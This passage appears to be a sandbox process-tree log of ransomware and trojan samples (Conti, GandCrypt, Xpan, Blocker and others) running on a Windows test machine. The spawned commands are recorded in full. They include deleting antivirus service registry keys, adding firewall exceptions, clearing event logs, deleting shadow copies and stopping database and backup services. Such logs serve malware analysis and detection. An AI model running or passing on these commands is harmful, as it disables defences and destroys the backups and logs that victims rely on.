C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"4⤵PID:12092
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"4⤵PID:9444
-
-
C:\Windows\xk.exeC:\Windows\xk.exe4⤵PID:9396
-
-
C:\Windows\SysWOW64\IExplorer.exeC:\Windows\system32\IExplorer.exe4⤵PID:212
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"4⤵PID:11092
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"4⤵PID:13196
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"4⤵PID:6184
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"4⤵PID:11388
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"4⤵PID:13684
-
-
C:\Windows\xk.exeC:\Windows\xk.exe4⤵PID:11172
-
-
C:\Windows\SysWOW64\IExplorer.exeC:\Windows\system32\IExplorer.exe4⤵PID:5836
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"4⤵PID:11960
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"4⤵PID:1772
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"4⤵PID:12800
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"4⤵PID:14800
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"4⤵PID:10832
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10616 -s 10644⤵
- Program crash
PID:14668 -
C:\Windows\SysWOW64\Shell.exe"C:\Windows\system32\Shell.exe"5⤵PID:15272
-
-
C:\Windows\SysWOW64\Shell.exe"C:\Windows\system32\Shell.exe"5⤵PID:14588
-
-
-
-
C:\Users\Admin\Desktop\00440\Trojan-Ransom.Win32.Blocker.lcde-0871149e18fd118597e0807d890c6a345909228fae16bb4037286894af4a0804.exeTrojan-Ransom.Win32.Blocker.lcde-0871149e18fd118597e0807d890c6a345909228fae16bb4037286894af4a0804.exe3⤵PID:10756
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\dll.bat" "4⤵PID:13788
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\loading.sfx.exeloading.sfx.exe -pAMG -dC:\Users\Admin\AppData\Roaming5⤵PID:14760
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\loading.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\loading.exe"6⤵PID:5364
-
C:\Users\Admin\AppData\Roaming\PACK.EXE"C:\Users\Admin\AppData\Roaming\PACK.EXE"7⤵PID:12984
-
-
-
-
-
-
C:\Users\Admin\Desktop\00440\Trojan-Ransom.Win32.Blocker.naos-a24cbb6e6d26c1dd1ceaa509fe0c0de38a7437e336b61e94005786cfdcf7ef38.exeTrojan-Ransom.Win32.Blocker.naos-a24cbb6e6d26c1dd1ceaa509fe0c0de38a7437e336b61e94005786cfdcf7ef38.exe3⤵PID:2208
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\files\3 start.vbs"4⤵PID:10428
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\files\load.cmd" "5⤵PID:2196
-
C:\Windows\files\2.exe2.exe -pJF54HGUI45T4G45Y6⤵PID:11836
-
C:\Windows\files\1.exe"C:\Windows\files\1.exe"7⤵PID:14284
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\files\2 start.vbs"8⤵PID:11528
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\files\Start.cmd" "9⤵PID:9648
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\RUNDLL32.EXE User32.dll, UpdatePerUserSystemParameters10⤵PID:13200
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f10⤵PID:6220
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f10⤵PID:14060
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f10⤵PID:8592
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f10⤵PID:1948
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f10⤵PID:9196
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f10⤵PID:8700
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f10⤵PID:6304
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f10⤵PID:10608
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f10⤵PID:10192
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f10⤵PID:11768
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f10⤵PID:11728
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f10⤵PID:8992
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f10⤵PID:13132
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f10⤵PID:12900
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f10⤵PID:14896
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f10⤵PID:10724
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f10⤵PID:10632
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f10⤵PID:13756
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f10⤵PID:9816
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f10⤵PID:12444
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f10⤵PID:3368
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f10⤵PID:7528
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f10⤵PID:11088
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f10⤵PID:13132
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f10⤵PID:11680
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f10⤵PID:736
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f10⤵PID:14684
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f10⤵PID:15072
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f10⤵PID:6676
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f10⤵PID:10360
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f10⤵PID:3560
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f10⤵PID:11624
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f10⤵PID:8724
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f10⤵PID:12908
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f10⤵PID:13920
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f10⤵PID:13284
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f10⤵PID:14892
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f10⤵PID:5928
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f10⤵PID:9760
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f10⤵PID:12192
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f10⤵PID:13052
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f10⤵PID:8992
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f10⤵PID:9488
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f10⤵PID:14256
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f10⤵PID:9400
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f10⤵PID:15268
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f10⤵PID:13544
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f10⤵PID:12180
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f10⤵PID:13072
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f10⤵PID:5964
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f10⤵PID:13128
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f10⤵PID:12200
-
-
C:\Windows\SysWOW64\reg.exeReg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f10⤵PID:5364
-
-
-
-
C:\Windows\files\SplashLoader.exe"C:\Windows\files\SplashLoader.exe"8⤵PID:7468
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\SystemCache\run.cmd" /S"9⤵PID:14860
-
C:\Windows\SysWOW64\regedit.exeregedit.exe /S "DUDe.reg"10⤵
- Runs .reg file with regedit
PID:12176
-
-
-
-
C:\Windows\files\disabler.exe"C:\Windows\files\disabler.exe"8⤵PID:4980
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\files\1.vbs"9⤵PID:4692
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\files\bat.cmd" "10⤵PID:15112
-
C:\Windows\SysWOW64\regedit.exeregedit.exe /S "1.reg"11⤵
- Runs .reg file with regedit
PID:4984
-
-
-
-
-
-
C:\Windows\files\Desktop.sfx.exe"C:\Windows\files\Desktop.sfx.exe"7⤵PID:13852
-
C:\Windows\files\Desktop.exe"C:\Windows\files\Desktop.exe"8⤵PID:5244
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\files\1 start.vbs"9⤵PID:5976
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\files\run.cmd" "10⤵PID:7384
-
C:\Windows\files\SplashRun.exeSplashRun.exe -pJG5J6I4UGTJ458TG4H5T45HT454Y45Y11⤵PID:12652
-
C:\Windows\files\SplashService.exe"C:\Windows\files\SplashService.exe"12⤵PID:13168
-
C:\Users\Admin\AppData\Roaming\server.exe"C:\Users\Admin\AppData\Roaming\server.exe"13⤵PID:13304
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE14⤵
- Modifies Windows Firewall
PID:9908
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe"14⤵
- Modifies Windows Firewall
PID:6800
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE14⤵
- Modifies Windows Firewall
PID:12080
-
-
-
-
C:\Windows\files\Splash Bootstrapper.exe"C:\Windows\files\Splash Bootstrapper.exe"12⤵PID:9960
-
C:\Windows\files\Splash.exe"C:\Windows\files\Splash.exe"13⤵PID:8900
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.me/rbxsplash14⤵PID:14808
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd5e3646f8,0x7ffd5e364708,0x7ffd5e36471815⤵PID:11144
-
-
-
-
-
C:\Windows\files\11.exe"C:\Windows\files\11.exe"12⤵PID:14332
-
C:\Windows\files\11.exe"C:\Windows\files\11.exe"13⤵PID:6920
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\Desktop\00440\Trojan-Ransom.Win32.Conti.j-006b9d3d9a3552f18d753673b3249971d51cf7eef026897e1680def8dc365d2b.exeTrojan-Ransom.Win32.Conti.j-006b9d3d9a3552f18d753673b3249971d51cf7eef026897e1680def8dc365d2b.exe3⤵PID:2528
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 5484⤵
- Program crash
PID:10828
-
-
-
C:\Users\Admin\Desktop\00440\Trojan-Ransom.Win32.Cryptodef.aggz-ca1a46f055d7d9f7b62a6ce524e4ac0e2fb184d817e9df1b861be68c748c2391.exeTrojan-Ransom.Win32.Cryptodef.aggz-ca1a46f055d7d9f7b62a6ce524e4ac0e2fb184d817e9df1b861be68c748c2391.exe3⤵PID:10148
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Users\Admin\Desktop\00440\Mytianyaapi.dll"4⤵PID:6916
-
-
-
C:\Users\Admin\Desktop\00440\Trojan-Ransom.Win32.Foreign.olsm-2e411af46bd2643fdce4a7bed6efb5d443b28a7a3b9fc1bb9b0c35d91d8d2272.exeTrojan-Ransom.Win32.Foreign.olsm-2e411af46bd2643fdce4a7bed6efb5d443b28a7a3b9fc1bb9b0c35d91d8d2272.exe3⤵PID:1616
-
-
C:\Users\Admin\Desktop\00440\Trojan-Ransom.Win32.GandCrypt.jfg-11e876b6968565e581dc99d98bbcd6edc5dfc8a8699dcd99c1f98706159d2ce2.exeTrojan-Ransom.Win32.GandCrypt.jfg-11e876b6968565e581dc99d98bbcd6edc5dfc8a8699dcd99c1f98706159d2ce2.exe3⤵PID:14968
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 14968 -s 4804⤵
- Program crash
PID:14924
-
-
-
C:\Users\Admin\Desktop\00440\Trojan-Ransom.Win32.GenericCryptor.cys-3c76007e5291a9acce6ead21e4b64e86b42af9f173b8f9a615bb175af0421926.exeTrojan-Ransom.Win32.GenericCryptor.cys-3c76007e5291a9acce6ead21e4b64e86b42af9f173b8f9a615bb175af0421926.exe3⤵PID:13688
-
C:\Users\Admin\AppData\Local\Temp\vyygd.exe"C:\Users\Admin\AppData\Local\Temp\vyygd.exe"4⤵PID:11860
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Local\Temp\pihoz.exe"5⤵PID:4444
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\_uinsey.bat" "4⤵PID:11168
-
-
-
C:\Users\Admin\Desktop\00440\Trojan-Ransom.Win32.Gimemo.ceh-63ab2867c6c51f348401effda166c9ac473ea4115cee1b1932892ad2fa90c6b0.exeTrojan-Ransom.Win32.Gimemo.ceh-63ab2867c6c51f348401effda166c9ac473ea4115cee1b1932892ad2fa90c6b0.exe3⤵PID:14616
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 14616 -s 3404⤵
- Program crash
PID:8564
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 14616 -s 3444⤵
- Program crash
PID:12940
-
-
-
C:\Users\Admin\Desktop\00440\Trojan-Ransom.Win32.Xpan.f-139d4cc572df62ad4c2b72cb5b90b711964276e093d631947984e8b796ab1652.exeTrojan-Ransom.Win32.Xpan.f-139d4cc572df62ad4c2b72cb5b90b711964276e093d631947984e8b796ab1652.exe3⤵PID:10976
-
C:\Windows\SysWOW64\cmd.exe/c wevtutil cl Application4⤵PID:7508
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl Application5⤵
- Clears Windows event logs
PID:14908
-
-
-
C:\Windows\SysWOW64\cmd.exe/c wevtutil cl security4⤵PID:7968
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl security5⤵
- Clears Windows event logs
PID:10080
-
-
-
C:\Windows\SysWOW64\cmd.exe/c wevtutil cl setup4⤵PID:13748
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl setup5⤵
- Clears Windows event logs
PID:11140
-
-
-
C:\Windows\SysWOW64\cmd.exe/c wevtutil cl system4⤵PID:11820
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl system5⤵
- Clears Windows event logs
PID:12272
-
-
-
C:\Windows\SysWOW64\cmd.exe/c vssadmin.exe Delete Shadows \/All \/Quiet4⤵PID:10176
-
-
C:\Windows\SysWOW64\cmd.exe/c WMIC SERVICE WHERE 'caption LIKE '%Firebird%'' CALL STOPSERVICE4⤵PID:212
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE 'caption LIKE '%Firebird%'' CALL STOPSERVICE5⤵PID:13272
-
-
-
C:\Windows\SysWOW64\cmd.exe/c WMIC SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL STOPSERVICE4⤵PID:14480
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL STOPSERVICE5⤵PID:8560
-
-
-
C:\Windows\SysWOW64\cmd.exe/c WMIC SERVICE WHERE 'caption LIKE '%SQL%'' CALL STOPSERVICE4⤵PID:4884
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE 'caption LIKE '%SQL%'' CALL STOPSERVICE5⤵PID:10568
-
-
-
C:\Windows\SysWOW64\cmd.exe/c WMIC SERVICE WHERE 'caption LIKE '%Exchange%'' CALL STOPSERVICE4⤵PID:12844
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE 'caption LIKE '%Exchange%'' CALL STOPSERVICE5⤵PID:1396
-
-
-
C:\Windows\SysWOW64\cmd.exe/c WMIC SERVICE WHERE 'caption LIKE '%wsbex%'' CALL STOPSERVICE4⤵PID:14608
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE 'caption LIKE '%wsbex%'' CALL STOPSERVICE5⤵PID:7592
-
-
-
C:\Windows\SysWOW64\cmd.exe/c WMIC SERVICE WHERE 'caption LIKE '%postgresql%'' CALL STOPSERVICE4⤵PID:10960
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE 'caption LIKE '%postgresql%'' CALL STOPSERVICE5⤵PID:8920
-
-
-
C:\Windows\SysWOW64\cmd.exe/c WMIC SERVICE WHERE 'caption LIKE '%BACKP%'' CALL STOPSERVICE4⤵PID:11560
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE 'caption LIKE '%BACKP%'' CALL STOPSERVICE5⤵PID:3632
-
-
-
C:\Windows\SysWOW64\cmd.exe/c WMIC SERVICE WHERE 'caption LIKE '%tomcat%'' CALL STOPSERVICE4⤵PID:5548
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE 'caption LIKE '%tomcat%'' CALL STOPSERVICE5⤵PID:12248
-
-
-
C:\Windows\SysWOW64\cmd.exe/c WMIC SERVICE WHERE 'caption LIKE '%SharePoint%'' CALL STOPSERVICE4⤵PID:13320
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE 'caption LIKE '%SharePoint%'' CALL STOPSERVICE5⤵PID:6180
-
-
-
C:\Windows\SysWOW64\cmd.exe/c WMIC SERVICE WHERE 'caption LIKE '%SBS%'' CALL STOPSERVICE4⤵PID:12340
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE 'caption LIKE '%SBS%'' CALL STOPSERVICE5⤵PID:10920
-
-
-
C:\Windows\SysWOW64\cmd.exe/c WMIC SERVICE WHERE 'caption LIKE '%Firebird%'' CALL ChangeStartMode 'Disabled'4⤵PID:8416
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE 'caption LIKE '%Firebird%'' CALL ChangeStartMode 'Disabled'5⤵PID:8280
-
-
-
C:\Windows\SysWOW64\cmd.exe/c WMIC SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL ChangeStartMode 'Disabled'4⤵PID:15304
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL ChangeStartMode 'Disabled'5⤵PID:14204
-
-
-
C:\Windows\SysWOW64\cmd.exe/c WMIC SERVICE WHERE 'caption LIKE '%SQL%'' CALL ChangeStartMode 'Disabled'4⤵PID:8356
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE 'caption LIKE '%SQL%'' CALL ChangeStartMode 'Disabled'5⤵PID:9032
-
-
-
C:\Windows\SysWOW64\cmd.exe/c WMIC SERVICE WHERE 'caption LIKE '%Exchange%'' CALL ChangeStartMode 'Disabled'4⤵PID:14028
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE 'caption LIKE '%Exchange%'' CALL ChangeStartMode 'Disabled'5⤵PID:9820
-
-
-
C:\Windows\SysWOW64\cmd.exe/c WMIC SERVICE WHERE 'caption LIKE '%wsbex%'' CALL ChangeStartMode 'Disabled'4⤵PID:4596
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE 'caption LIKE '%wsbex%'' CALL ChangeStartMode 'Disabled'5⤵PID:14184
-
-
-
C:\Windows\SysWOW64\cmd.exe/c WMIC SERVICE WHERE 'caption LIKE '%postgresql%'' CALL ChangeStartMode 'Disabled'4⤵PID:14368
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE 'caption LIKE '%postgresql%'' CALL ChangeStartMode 'Disabled'5⤵PID:2640
-
-
-
C:\Windows\SysWOW64\cmd.exe/c WMIC SERVICE WHERE 'caption LIKE '%BACKP%'' CALL ChangeStartMode 'Disabled'4⤵PID:13268
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE 'caption LIKE '%BACKP%'' CALL ChangeStartMode 'Disabled'5⤵PID:12920
-
-
-
C:\Windows\SysWOW64\cmd.exe/c WMIC SERVICE WHERE 'caption LIKE '%tomcat%'' CALL ChangeStartMode 'Disabled'4⤵PID:8244
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE 'caption LIKE '%tomcat%'' CALL ChangeStartMode 'Disabled'5⤵PID:10500
-
-
-
C:\Windows\SysWOW64\cmd.exe/c WMIC SERVICE WHERE 'caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled'4⤵PID:10068
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE 'caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled'5⤵PID:7128
-
-
-
C:\Windows\SysWOW64\cmd.exe/c WMIC SERVICE WHERE 'caption LIKE '%SBS%'' CALL ChangeStartMode 'Disabled'4⤵PID:11968
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC SERVICE WHERE 'caption LIKE '%SBS%'' CALL ChangeStartMode 'Disabled'5⤵PID:7652
-
-
-
C:\Windows\SysWOW64\cmd.exe/c sc config FirebirdServerDefaultInstance start= disabled4⤵PID:1908
-
C:\Windows\SysWOW64\sc.exesc config FirebirdServerDefaultInstance start= disabled5⤵
- Launches sc.exe
PID:8288
-
-
-
C:\Windows\SysWOW64\cmd.exe/c taskkill \/IM fb_inet_server.exe \/F4⤵PID:12804
-
C:\Windows\SysWOW64\taskkill.exetaskkill \/IM fb_inet_server.exe \/F5⤵
- Kills process with taskkill
PID:10996
-
-
-
C:\Windows\SysWOW64\cmd.exe/c net stop FirebirdServerDefaultInstance4⤵PID:2688
-
-
-
C:\Users\Admin\Desktop\00440\Trojan.MSIL.Crypt.gacu-4946ccb2f5ca2419601dff9e4903c8091f06c1f964abc36eb8ca37dca797ec35.exeTrojan.MSIL.Crypt.gacu-4946ccb2f5ca2419601dff9e4903c8091f06c1f964abc36eb8ca37dca797ec35.exe3⤵PID:1132
-
-
C:\Users\Admin\Desktop\00440\Trojan.MSIL.Crypt.gqjt-6a221cd668d7c4d88f7b5b1abb1ec4a2d87ca3002e16f39d2d5b8478bd3ca31d.exeTrojan.MSIL.Crypt.gqjt-6a221cd668d7c4d88f7b5b1abb1ec4a2d87ca3002e16f39d2d5b8478bd3ca31d.exe3⤵PID:4428
-
-
C:\Users\Admin\Desktop\00440\Trojan.MSIL.Crypt.htxs-32db6450fad122a5d8c537a5f7b16795f01f2516f2247d4c5748efec82c12775.exeTrojan.MSIL.Crypt.htxs-32db6450fad122a5d8c537a5f7b16795f01f2516f2247d4c5748efec82c12775.exe3⤵PID:10384
-
C:\Users\Admin\AppData\Roaming\xCbSVyFS.exe"C:\Users\Admin\AppData\Roaming\xCbSVyFS.exe"4⤵PID:8872
-
-
-
C:\Users\Admin\Desktop\00440\Trojan.MSIL.Crypt.htyl-8c0b2464e9e62a19b2610e0de6807918e80c49d260791fa579eb35692b8ac6a9.exeTrojan.MSIL.Crypt.htyl-8c0b2464e9e62a19b2610e0de6807918e80c49d260791fa579eb35692b8ac6a9.exe3⤵PID:11556
-
C:\Users\Admin\AppData\Local\Temp\Lsoso.exe"C:\Users\Admin\AppData\Local\Temp\Lsoso.exe"4⤵PID:14016
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵PID:11508
-
-
-
-
